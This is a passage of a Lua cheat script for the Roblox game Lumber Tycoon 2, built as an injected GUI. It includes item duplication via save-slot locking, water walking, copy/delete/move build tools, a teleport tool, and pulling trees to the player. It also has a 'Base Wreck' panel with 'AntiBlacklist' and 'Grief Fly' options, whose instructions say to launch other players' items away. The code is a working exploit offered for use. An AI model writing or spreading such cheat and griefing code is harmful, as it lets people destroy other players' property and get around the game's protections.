  2557. l.Name = "Humanoid"
  2558. wait(0.1)
  2559. game.Players.LocalPlayer.Character["1"]:Destroy()
  2560. game.Workspace.CurrentCamera.CameraSubject = game.Players.LocalPlayer.Character
  2561. game.Players.LocalPlayer.Character.Animate.Disabled = true
  2562. l.Changed:Connect(function()
  2563. if l then
  2564. l.WalkSpeed=Walk
  2565. l.JumpPower=Jump
  2566. end
  2567. end)
  2568. end)
  2569.  
  2570. --- Dupe ---
  2571.  
  2572. MoreInfo.MouseButton1Down:connect(function()
  2573. if MoreInfo.Text == "Info" then
  2574. MoreInfo.Text = "Close Info"
  2575. Info.Visible = true
  2576. else
  2577. MoreInfo.Text = "Info"
  2578. Info.Visible = false
  2579. end
  2580. end)
  2581.  
  2582. Option = false
  2583.  
  2584. Dupe.MouseButton1Down:connect(function()
  2585. plr = game:GetService("Players").LocalPlayer
  2586. slot = plr.CurrentSaveSlot
  2587. if Option == false then
  2588. if slot.Value == -1 then
  2589. Option = true
  2590. slot.RobloxLocked = true
  2591. Duper.Text = "Duping Active"
  2592. Duper.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2593. Duper.TextColor3 = Color3.new(1, 1, 1)
  2594. Dupe.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2595. Dupe.TextColor3 = Color3.new(1, 1, 1)
  2596. Dupe.Text = "Duping"
  2597. DupingText1.Text = "Loaded Slot Will NOT Save\n\nMake sure to reload your slot after duping to make sure you get your items back (If you leave before reloading all your changes will be saved)."
  2598. end
  2599. else
  2600. Option = false
  2601. slot.RobloxLocked = false
  2602. Duper.Text = "Item Duping"
  2603. Duper.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2604. Duper.TextColor3 = Color3.new(1, 1, 1)
  2605. Dupe.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2606. Dupe.TextColor3 = Color3.new(1, 1, 1)
  2607. Dupe.Text = "Dupe"
  2608. DupingText1.Text = "Loaded Slot Will Save"
  2609. end
  2610. end)
  2611.  
  2612. --- Water Walk ---
  2613.  
  2614. WaterCollide.MouseButton1Down:connect(function()
  2615. if WCollide == "Nothing" then
  2616. WCollide = "On"
  2617. WaterCollide.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2618. WaterCollide.Text = "Water is Solid"
  2619. for i,v in pairs(game.Workspace.Water:GetChildren()) do
  2620. if v:IsA("Part") then
  2621. v.CanCollide = true
  2622. end
  2623. end
  2624. else
  2625. WCollide = "Nothing"
  2626. WaterCollide.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2627. WaterCollide.Text = "Walk on Water"
  2628. for i,v in pairs(game.Workspace.Water:GetChildren()) do
  2629. if v:IsA("Part") then
  2630. v.CanCollide = false
  2631. end
  2632. end
  2633. end
  2634. end)
  2635.  
  2636. --- BTools ---
  2637.  
  2638. CopyTool.MouseButton1Down:connect(function()
  2639. if BTool == "Copy" then
  2640. BTool = "Nothing"
  2641. CopyTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2642. else
  2643. BTool = "Copy"
  2644. CopyTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2645. DeleteTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2646. MoveTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2647. end
  2648. end)
  2649.  
  2650. DeleteTool.MouseButton1Down:connect(function()
  2651. if BTool == "Delete" then
  2652. BTool = "Nothing"
  2653. DeleteTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2654. else
  2655. BTool = "Delete"
  2656. DeleteTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2657. CopyTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2658. MoveTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2659. end
  2660. end)
  2661.  
  2662. MoveTool.MouseButton1Down:connect(function()
  2663. if BTool == "Move" then
  2664. BTool = "Nothing"
  2665. MoveTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2666. else
  2667. BTool = "Move"
  2668. MoveTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  2669. CopyTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2670. DeleteTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  2671. end
  2672. end)
  2673.  
  2674. Mouse.Button1Up:connect(function()
  2675. MDown = false
  2676. end)
  2677.  
  2678. Mouse.Button1Down:connect(function()
  2679. MDown = true
  2680. if BTool == "Copy" then
  2681. if Mouse.Target ~= nil then
  2682. Clone = Mouse.Target:clone()
  2683. Clone.Parent = game.Workspace
  2684. end
  2685. end
  2686.  
  2687. if BTool == "Delete" then
  2688. if Mouse.Target ~= nil then
  2689. Mouse.Target:remove()
  2690. end
  2691. end
  2692.  
  2693. if BTool == "Move" then
  2694. if Mouse.Target ~= nil then
  2695. MoveObject = Mouse.Target
  2696. end
  2697. end
  2698.  
  2699. wait()
  2700. if Clone ~= nil then
  2701. Clone.CanCollide = false
  2702. repeat
  2703. wait()
  2704. SubX = Clone.Size.X/2
  2705. SubY = Clone.Size.Y/2
  2706. SubZ = Clone.Size.Z/2
  2707. Clone.Position = Vector3.new(Mouse.Hit.X - SubX, Mouse.Hit.Y - SubY, Mouse.Hit.Z - SubZ)
  2708. until MDown == false
  2709. Clone.CanCollide = true
  2710. Clone.Position = Clone.Position + Vector3.new(SubX, SubY, SubZ)
  2711. Clone = nil
  2712. end
  2713.  
  2714. if MoveObject ~= nil then
  2715. MoveObject.CanCollide = false
  2716. repeat
  2717. wait()
  2718. SubX = MoveObject.Size.X/2
  2719. SubY = MoveObject.Size.Y/2
  2720. SubZ = MoveObject.Size.Z/2
  2721. MoveObject.Position = Vector3.new(Mouse.Hit.X - SubX, Mouse.Hit.Y - SubY, Mouse.Hit.Z - SubZ)
  2722. until MDown == false
  2723. MoveObject.CanCollide = true
  2724. MoveObject.Position = MoveObject.Position + Vector3.new(SubX, SubY, SubZ)
  2725. MoveObject= nil
  2726. end
  2727. end)
  2728.  
  2729. --- TP Tool ---
  2730.  
  2731. TPTool.MouseButton1Down:connect(function()
  2732. local Tele = Instance.new("Tool", game.Players.LocalPlayer.Backpack)
  2733. Tele.RequiresHandle = false
  2734. Tele.RobloxLocked = true
  2735. Tele.Name = "TPTool"
  2736. Tele.ToolTip = "Teleport Tool"
  2737. Tele.Equipped:connect(function(Mouse)
  2738. Mouse.Button1Down:connect(function()
  2739. if Mouse.Target then
  2740. game.Workspace:FindFirstChild(game.Players.LocalPlayer.Name).HumanoidRootPart.CFrame = (CFrame.new(Mouse.Hit.x, Mouse.Hit.y + 5, Mouse.Hit.z))
  2741. end
  2742. end)
  2743. end)
  2744. end)
  2745.  
  2746. --- Departure ---
  2747.  
  2748. game.Workspace.Ferry.TimeToDeparture.Changed:connect(function()
  2749. Depart.Text = "Ferry Departs: ".. game.Workspace.Ferry.TimeToDeparture.Value
  2750. if Depart.Text == "Ferry Departs: 0" then
  2751. wait(6)
  2752. Depart.Text = "Ferry has Departed"
  2753. else
  2754. Depart.Text = "Ferry Departs: ".. game.Workspace.Ferry.TimeToDeparture.Value
  2755. end
  2756. end)
  2757.  
  2758. --- Spawn Tree ---
  2759.  
  2760. function bringtree(telewoodtype)
  2761. local Wood = {
  2762. "Cherry",
  2763. "Palm",
  2764. "CaveCrawler",
  2765. "Generic",
  2766. "Spooky",
  2767. "Fir",
  2768. "GreenSwampy",
  2769. "Oak",
  2770. "Birch",
  2771. "Volcano",
  2772. "LoneCave",
  2773. "GoldSwampy",
  2774. "Koa",
  2775. "Walnut"
  2776. }
  2777.  
  2778. local NewRegionNames = {}
  2779.  
  2780. --Name Changer For Seperating What Is What
  2781.  
  2782. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2783. if l.Name == "TreeRegion" then
  2784. if l ~= nil then
  2785. for i, b in pairs(l:GetChildren()) do
  2786. if b:IsA("Model") then
  2787. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[1] then
  2788. l.Name = Wood[1]
  2789. warn("TreeRegion #1 Has Been Changed To: "..Wood[1])
  2790. table.insert(NewRegionNames, l.Name)
  2791. end
  2792. end
  2793. end
  2794. end
  2795. end
  2796. end
  2797.  
  2798. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2799. if l.Name == "TreeRegion" then
  2800. if l ~= nil then
  2801. for i, b in pairs(l:GetChildren()) do
  2802. if b:IsA("Model") then
  2803. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[2] then
  2804. l.Name = Wood[2]
  2805. warn("TreeRegion #2 Has Been Changed To: "..Wood[2])
  2806. table.insert(NewRegionNames, l.Name)
  2807. end
  2808. end
  2809. end
  2810. end
  2811. end
  2812. end
  2813.  
  2814. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2815. if l.Name == "TreeRegion" then
  2816. if l ~= nil then
  2817. for i, b in pairs(l:GetChildren()) do
  2818. if b:IsA("Model") then
  2819. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[3] then
  2820. l.Name = Wood[3]
  2821. warn("TreeRegion #3 Has Been Changed To: "..Wood[3])
  2822. table.insert(NewRegionNames, l.Name)
  2823. end
  2824. end
  2825. end
  2826. end
  2827. end
  2828. end
  2829.  
  2830. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2831. if l.Name == "TreeRegion" then
  2832. if l ~= nil then
  2833. for i, b in pairs(l:GetChildren()) do
  2834. if b:IsA("Model") then
  2835. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[4] then
  2836. l.Name = Wood[4]
  2837. warn("TreeRegion #4 Has Been Changed To: "..Wood[4])
  2838. table.insert(NewRegionNames, l.Name)
  2839. end
  2840. end
  2841. end
  2842. end
  2843. end
  2844. end
  2845.  
  2846. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2847. if l.Name == "TreeRegion" then
  2848. if l ~= nil then
  2849. for i, b in pairs(l:GetChildren()) do
  2850. if b:IsA("Model") then
  2851. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[5] then
  2852. l.Name = Wood[5]
  2853. warn("TreeRegion #5 Has Been Changed To: "..Wood[5])
  2854. table.insert(NewRegionNames, l.Name)
  2855. end
  2856. end
  2857. end
  2858. end
  2859. end
  2860. end
  2861.  
  2862. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2863. if l.Name == "TreeRegion" then
  2864. if l ~= nil then
  2865. for i, b in pairs(l:GetChildren()) do
  2866. if b:IsA("Model") then
  2867. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[6] then
  2868. l.Name = Wood[6]
  2869. warn("TreeRegion #6 Has Been Changed To: "..Wood[6])
  2870. table.insert(NewRegionNames, l.Name)
  2871. end
  2872. end
  2873. end
  2874. end
  2875. end
  2876. end
  2877.  
  2878. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2879. if l.Name == "TreeRegion" then
  2880. if l ~= nil then
  2881. for i, b in pairs(l:GetChildren()) do
  2882. if b:IsA("Model") then
  2883. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[7] then
  2884. l.Name = Wood[7]
  2885. warn("TreeRegion #7 Has Been Changed To: "..Wood[7])
  2886. table.insert(NewRegionNames, l.Name)
  2887. end
  2888. end
  2889. end
  2890. end
  2891. end
  2892. end
  2893.  
  2894. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2895. if l.Name == "TreeRegion" then
  2896. if l ~= nil then
  2897. for i, b in pairs(l:GetChildren()) do
  2898. if b:IsA("Model") then
  2899. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[8] then
  2900. l.Name = Wood[8]
  2901. warn("TreeRegion #8 Has Been Changed To: "..Wood[8])
  2902. table.insert(NewRegionNames, l.Name)
  2903. end
  2904. end
  2905. end
  2906. end
  2907. end
  2908. end
  2909.  
  2910. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2911. if l.Name == "TreeRegion" then
  2912. if l ~= nil then
  2913. for i, b in pairs(l:GetChildren()) do
  2914. if b:IsA("Model") then
  2915. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[9] then
  2916. l.Name = Wood[9]
  2917. warn("TreeRegion #9 Has Been Changed To: "..Wood[9])
  2918. table.insert(NewRegionNames, l.Name)
  2919. end
  2920. end
  2921. end
  2922. end
  2923. end
  2924. end
  2925.  
  2926. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2927. if l.Name == "TreeRegion" then
  2928. if l ~= nil then
  2929. for i, b in pairs(l:GetChildren()) do
  2930. if b:IsA("Model") then
  2931. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[10] then
  2932. l.Name = Wood[10]
  2933. warn("TreeRegion #10 Has Been Changed To: "..Wood[10])
  2934. table.insert(NewRegionNames, l.Name)
  2935. end
  2936. end
  2937. end
  2938. end
  2939. end
  2940. end
  2941.  
  2942. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2943. if l.Name == "TreeRegion" then
  2944. if l ~= nil then
  2945. for i, b in pairs(l:GetChildren()) do
  2946. if b:IsA("Model") then
  2947. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[11] then
  2948. l.Name = Wood[11]
  2949. warn("TreeRegion #11 Has Been Changed To: "..Wood[11])
  2950. table.insert(NewRegionNames, l.Name)
  2951. end
  2952. end
  2953. end
  2954. end
  2955. end
  2956. end
  2957.  
  2958. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2959. if l.Name == "TreeRegion" then
  2960. if l ~= nil then
  2961. for i, b in pairs(l:GetChildren()) do
  2962. if b:IsA("Model") then
  2963. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[12] then
  2964. l.Name = Wood[12]
  2965. warn("TreeRegion #12 Has Been Changed To: "..Wood[12])
  2966. table.insert(NewRegionNames, l.Name)
  2967. end
  2968. end
  2969. end
  2970. end
  2971. end
  2972. end
  2973.  
  2974. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2975. if l.Name == "TreeRegion" then
  2976. if l ~= nil then
  2977. for i, b in pairs(l:GetChildren()) do
  2978. if b:IsA("Model") then
  2979. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[13] then
  2980. l.Name = Wood[13]
  2981. warn("TreeRegion #13 Has Been Changed To: "..Wood[13])
  2982. table.insert(NewRegionNames, l.Name)
  2983. end
  2984. end
  2985. end
  2986. end
  2987. end
  2988. end
  2989.  
  2990. for i, l in pairs(game:GetService("Workspace"):GetChildren()) do
  2991. if l.Name == "TreeRegion" then
  2992. if l ~= nil then
  2993. for i, b in pairs(l:GetChildren()) do
  2994. if b:IsA("Model") then
  2995. if b:FindFirstChild("TreeClass") ~= nil and b.TreeClass.Value == Wood[14] then
  2996. l.Name = Wood[14]
  2997. warn("TreeRegion #14 Has Been Changed To: "..Wood[14])
  2998. table.insert(NewRegionNames, l.Name)
  2999. end
  3000. end
  3001. end
  3002. end
  3003. end
  3004. end
  3005.  
  3006. --Names Checker
  3007.  
  3008. for i, v in pairs(game:GetService("Workspace"):GetChildren()) do
  3009. print(v.Name)
  3010. end
  3011.  
  3012. --Teleporter
  3013.  
  3014. if telewoodtype == Wood[1] then
  3015. for i, v in pairs(game:GetService("Workspace")[Wood[1]]:GetChildren()) do
  3016. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[1] then
  3017. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3018. end
  3019. end
  3020. end
  3021.  
  3022. if telewoodtype == Wood[2] then
  3023. for i, v in pairs(game:GetService("Workspace")[Wood[2]]:GetChildren()) do
  3024. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[2] then
  3025. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3026. end
  3027. end
  3028. end
  3029.  
  3030. if telewoodtype == Wood[3] then
  3031. for i, v in pairs(game:GetService("Workspace")[Wood[3]]:GetChildren()) do
  3032. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[3] then
  3033. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3034. end
  3035. end
  3036. end
  3037.  
  3038. if telewoodtype == Wood[4] then
  3039. for i, v in pairs(game:GetService("Workspace")[Wood[4]]:GetChildren()) do
  3040. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[4] then
  3041. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3042. end
  3043. end
  3044. end
  3045.  
  3046. if telewoodtype == Wood[5] then
  3047. for i, v in pairs(game:GetService("Workspace")[Wood[5]]:GetChildren()) do
  3048. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[5] then
  3049. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3050. end
  3051. end
  3052. end
  3053.  
  3054. if telewoodtype == Wood[6] then
  3055. for i, v in pairs(game:GetService("Workspace")[Wood[6]]:GetChildren()) do
  3056. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[6] then
  3057. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3058. end
  3059. end
  3060. end
  3061.  
  3062. if telewoodtype == Wood[7] then
  3063. for i, v in pairs(game:GetService("Workspace")[Wood[7]]:GetChildren()) do
  3064. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[7] then
  3065. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3066. end
  3067. end
  3068. end
  3069.  
  3070. if telewoodtype == Wood[8] then
  3071. for i, v in pairs(game:GetService("Workspace")[Wood[8]]:GetChildren()) do
  3072. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[8] then
  3073. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3074. end
  3075. end
  3076. end
  3077.  
  3078. if telewoodtype == Wood[9] then
  3079. for i, v in pairs(game:GetService("Workspace")[Wood[9]]:GetChildren()) do
  3080. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[9] then
  3081. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3082. end
  3083. end
  3084. end
  3085.  
  3086. if telewoodtype == Wood[10] then
  3087. for i, v in pairs(game:GetService("Workspace")[Wood[10]]:GetChildren()) do
  3088. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[10] then
  3089. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3090. end
  3091. end
  3092. end
  3093.  
  3094. if telewoodtype == Wood[11] then
  3095. for i, v in pairs(game:GetService("Workspace")[Wood[11]]:GetChildren()) do
  3096. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[11] then
  3097. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3098. end
  3099. end
  3100. end
  3101.  
  3102. if telewoodtype == Wood[12] then
  3103. for i, v in pairs(game:GetService("Workspace")[Wood[12]]:GetChildren()) do
  3104. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[12] then
  3105. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3106. end
  3107. end
  3108. end
  3109.  
  3110. if telewoodtype == Wood[13] then
  3111. for i, v in pairs(game:GetService("Workspace")[Wood[13]]:GetChildren()) do
  3112. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[13] then
  3113. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3114. end
  3115. end
  3116. end
  3117.  
  3118. if telewoodtype == Wood[14] then
  3119. for i, v in pairs(game:GetService("Workspace")[Wood[14]]:GetChildren()) do
  3120. if v:FindFirstChild("TreeClass") ~= nil and v.TreeClass.Value == Wood[14] then
  3121. v:MoveTo(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(math.random(1,60), math.random(1,1), math.random(1,60)))
  3122. end
  3123. end
  3124. end
  3125. end
  3126.  
  3127. OakTree.MouseButton1Down:Connect(function()
  3128. bringtree('Generic')
  3129. end)
  3130.  
  3131. CherryTree.MouseButton1Down:Connect(function()
  3132. bringtree('Cherry')
  3133. end)
  3134.  
  3135. PalmTree.MouseButton1Down:Connect(function()
  3136. bringtree('Palm')
  3137. end)
  3138.  
  3139. CaveCrawlerTree.MouseButton1Down:Connect(function()
  3140. bringtree('CaveCrawler')
  3141. end)
  3142.  
  3143. SpookyTree.MouseButton1Down:Connect(function()
  3144. bringtree('Spooky')
  3145. end)
  3146.  
  3147. FirTree.MouseButton1Down:Connect(function()
  3148. bringtree('Fir')
  3149. end)
  3150.  
  3151. GreenTree.MouseButton1Down:Connect(function()
  3152. bringtree('GreenSwampy')
  3153. end)
  3154.  
  3155. BirchTree.MouseButton1Down:Connect(function()
  3156. bringtree('Birch')
  3157. end)
  3158.  
  3159. VolcanoTree.MouseButton1Down:Connect(function()
  3160. bringtree('Volcano')
  3161. end)
  3162.  
  3163. EndTimesTree.MouseButton1Down:Connect(function()
  3164. bringtree('LoneCave')
  3165. end)
  3166.  
  3167. ElmTree.MouseButton1Down:Connect(function()
  3168. bringtree('Oak')
  3169. end)
  3170.  
  3171. KoaTree.MouseButton1Down:Connect(function()
  3172. bringtree('Koa')
  3173. end)
  3174.  
  3175. GoldTree.MouseButton1Down:Connect(function()
  3176. bringtree('GoldSwampy')
  3177. end)
  3178.  
  3179. WalnutTree.MouseButton1Down:Connect(function()
  3180. bringtree('Walnut')
  3181. end)
  3182.  
  3183. --- ReJoin Server ---
  3184.  
  3185. ReJoinServer.MouseButton1Down:connect(function()
  3186. local placeId = "13822889"
  3187. game:GetService("TeleportService"):Teleport(placeId)
  3188. end)
  3189.  
  3190. --- End ---
  3191. end)
  3192.  
  3193. BaseWreck.Name = "Base Wreck"
  3194. BaseWreck.Parent = Main
  3195. BaseWreck.BackgroundColor3 = Color3.new(1, 1, 1)
  3196. BaseWreck.Position = UDim2.new(0.0645161271, 0, 0.187214628, 0)
  3197. BaseWreck.Size = UDim2.new(0, 161, 0, 30)
  3198. BaseWreck.Font = Enum.Font.Gotham
  3199. BaseWreck.Text = "Base Wreck"
  3200. BaseWreck.TextColor3 = Color3.new(0, 0, 0)
  3201. BaseWreck.TextSize = 14
  3202. BaseWreck.MouseButton1Down:connect(function()
  3203. local sound = Instance.new("Sound",game.Players.LocalPlayer)
  3204. sound.Name = "Sound"
  3205. sound.Volume = 10
  3206. sound.SoundId = "rbxassetid://2521946636"
  3207. sound.Looped = false
  3208. -- Instances:
  3209. local LT2Wrecker = Instance.new("ScreenGui")
  3210. local Main = Instance.new("Frame")
  3211. local AntiBlack = Instance.new("TextButton")
  3212. local Title = Instance.new("TextLabel")
  3213. local GriefFly = Instance.new("TextButton")
  3214. local Close = Instance.new("TextButton")
  3215. local Tutorial = Instance.new("TextButton")
  3216. local Tutorialfrm = Instance.new("Frame")
  3217. local InfoTUT = Instance.new("TextLabel")
  3218. local Closetut = Instance.new("TextButton")
  3219. local Credits0 = Instance.new("TextLabel")
  3220. local Credits1 = Instance.new("TextLabel")
  3221. local Openfrm = Instance.new("Frame")
  3222. local Open = Instance.new("TextButton")
  3223. --Properties:
  3224. LT2Wrecker.Name = "LT2 Wrecker"
  3225. LT2Wrecker.Parent = game.CoreGui
  3226. LT2Wrecker.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  3227.  
  3228. Main.Name = "Main"
  3229. Main.Parent = LT2Wrecker
  3230. Main.BackgroundColor3 = Color3.new(0, 0, 0)
  3231. Main.BackgroundTransparency = 0.69999998807907
  3232. Main.BorderColor3 = Color3.new(1, 1, 0)
  3233. Main.BorderSizePixel = 2
  3234. Main.Position = UDim2.new(0.454379559, 0, 0.144694537, 0)
  3235. Main.Size = UDim2.new(0, 220, 0, 200)
  3236. Main.Visible = false
  3237. Main.Active = true
  3238. Main.Draggable = true
  3239.  
  3240. AntiBlack.Name = "AntiBlack"
  3241. AntiBlack.Parent = Main
  3242. AntiBlack.BackgroundColor3 = Color3.new(0, 0, 0)
  3243. AntiBlack.BackgroundTransparency = 0.60000002384186
  3244. AntiBlack.BorderColor3 = Color3.new(1, 1, 0)
  3245. AntiBlack.BorderSizePixel = 2
  3246. AntiBlack.Position = UDim2.new(0.0454545468, 0, 0.200000003, 0)
  3247. AntiBlack.Size = UDim2.new(0, 200, 0, 50)
  3248. AntiBlack.Font = Enum.Font.SciFi
  3249. AntiBlack.Text = "Enable AntiBlacklist"
  3250. AntiBlack.TextColor3 = Color3.new(1, 1, 0)
  3251. AntiBlack.TextScaled = true
  3252. AntiBlack.TextSize = 14
  3253. AntiBlack.TextWrapped = true
  3254.  
  3255. Title.Name = "Title"
  3256. Title.Parent = Main
  3257. Title.BackgroundColor3 = Color3.new(0, 0, 0)
  3258. Title.BackgroundTransparency = 0.60000002384186
  3259. Title.BorderColor3 = Color3.new(1, 1, 0)
  3260. Title.BorderSizePixel = 2
  3261. Title.Size = UDim2.new(0, 220, 0, 20)
  3262. Title.Font = Enum.Font.SciFi
  3263. Title.Text = "YEET THE BASE"
  3264. Title.TextColor3 = Color3.new(1, 1, 0)
  3265. Title.TextScaled = true
  3266. Title.TextSize = 14
  3267. Title.TextWrapped = true
  3268.  
  3269. GriefFly.Name = "GriefFly"
  3270. GriefFly.Parent = Main
  3271. GriefFly.BackgroundColor3 = Color3.new(0, 0, 0)
  3272. GriefFly.BackgroundTransparency = 0.60000002384186
  3273. GriefFly.BorderColor3 = Color3.new(1, 1, 0)
  3274. GriefFly.BorderSizePixel = 2
  3275. GriefFly.Position = UDim2.new(0.0454545468, 0, 0.600000024, 0)
  3276. GriefFly.Size = UDim2.new(0, 200, 0, 50)
  3277. GriefFly.Font = Enum.Font.SciFi
  3278. GriefFly.Text = "Enable Grief Fly"
  3279. GriefFly.TextColor3 = Color3.new(1, 1, 0)
  3280. GriefFly.TextScaled = true
  3281. GriefFly.TextSize = 14
  3282. GriefFly.TextWrapped = true
  3283.  
  3284. Close.Name = "Close"
  3285. Close.Parent = Main
  3286. Close.BackgroundColor3 = Color3.new(0, 0, 0)
  3287. Close.BackgroundTransparency = 0.60000002384186
  3288. Close.BorderColor3 = Color3.new(1, 1, 0)
  3289. Close.BorderSizePixel = 2
  3290. Close.Position = UDim2.new(0.909090936, 0, 0, 0)
  3291. Close.Size = UDim2.new(0, 20, 0, 20)
  3292. Close.Font = Enum.Font.SciFi
  3293. Close.Text = "X"
  3294. Close.TextColor3 = Color3.new(1, 1, 0)
  3295. Close.TextScaled = true
  3296. Close.TextSize = 14
  3297. Close.TextWrapped = true
  3298.  
  3299. Tutorial.Name = "Tutorial"
  3300. Tutorial.Parent = Main
  3301. Tutorial.BackgroundColor3 = Color3.new(0, 0, 0)
  3302. Tutorial.BackgroundTransparency = 0.5
  3303. Tutorial.BorderColor3 = Color3.new(1, 1, 0)
  3304. Tutorial.BorderSizePixel = 2
  3305. Tutorial.Position = UDim2.new(0.0454545468, 0, 0.895000041, 0)
  3306. Tutorial.Size = UDim2.new(0, 200, 0, 21)
  3307. Tutorial.Font = Enum.Font.SciFi
  3308. Tutorial.Text = "How to use"
  3309. Tutorial.TextColor3 = Color3.new(1, 1, 0)
  3310. Tutorial.TextScaled = true
  3311. Tutorial.TextSize = 14
  3312. Tutorial.TextWrapped = true
  3313.  
  3314. Tutorialfrm.Name = "Tutorialfrm"
  3315. Tutorialfrm.Parent = Main
  3316. Tutorialfrm.BackgroundColor3 = Color3.new(0, 0, 0)
  3317. Tutorialfrm.BackgroundTransparency = 0.69999998807907
  3318. Tutorialfrm.BorderColor3 = Color3.new(1, 1, 0)
  3319. Tutorialfrm.BorderSizePixel = 2
  3320. Tutorialfrm.Position = UDim2.new(1, 0, 0, 0)
  3321. Tutorialfrm.Size = UDim2.new(0, 100, 0, 200)
  3322. Tutorialfrm.Visible = false
  3323. Tutorialfrm.Active = true
  3324.  
  3325. InfoTUT.Name = "InfoTUT"
  3326. InfoTUT.Parent = Tutorialfrm
  3327. InfoTUT.BackgroundColor3 = Color3.new(0, 0, 0)
  3328. InfoTUT.BackgroundTransparency = 0.69999998807907
  3329. InfoTUT.BorderColor3 = Color3.new(1, 1, 0)
  3330. InfoTUT.BorderSizePixel = 2
  3331. InfoTUT.Size = UDim2.new(0, 100, 0, 170)
  3332. InfoTUT.Font = Enum.Font.SciFi
  3333. InfoTUT.Text = "1. Enable AntiBlacklist. 2. Enable Grief Fly. 3. Touch someone's loose item to lauch it away"
